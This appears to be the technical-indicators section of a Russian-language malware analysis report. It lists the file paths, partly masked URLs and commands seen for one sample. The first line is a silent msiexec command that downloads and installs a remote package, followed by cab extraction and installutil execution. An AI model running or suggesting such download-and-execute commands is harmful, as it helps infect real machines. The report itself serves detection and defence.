Техническая информация
- '<SYSTEM32>\msiexec.exe' /i http://66.##6.40.103/clara.msi /qn
- %WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe
- %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\msiwrapper.ini
- %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files.cab
- %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\$dpx$.tmp\ad7088408ed5d744bb341ef376c1e44b.tmp
- %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\$dpx$.tmp\ad7088408ed5d744bb341ef376c1e44b.tmp в %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\test.exe
- http://66.##6.40.103/clara.msi
- http://66.##6.40.103/bin.bin
- http://66.##6.40.103/infos.php
- DNS ASK sp###.network
- '%TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\test.exe'
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files' (со скрытым окном)
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files
- '%WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe'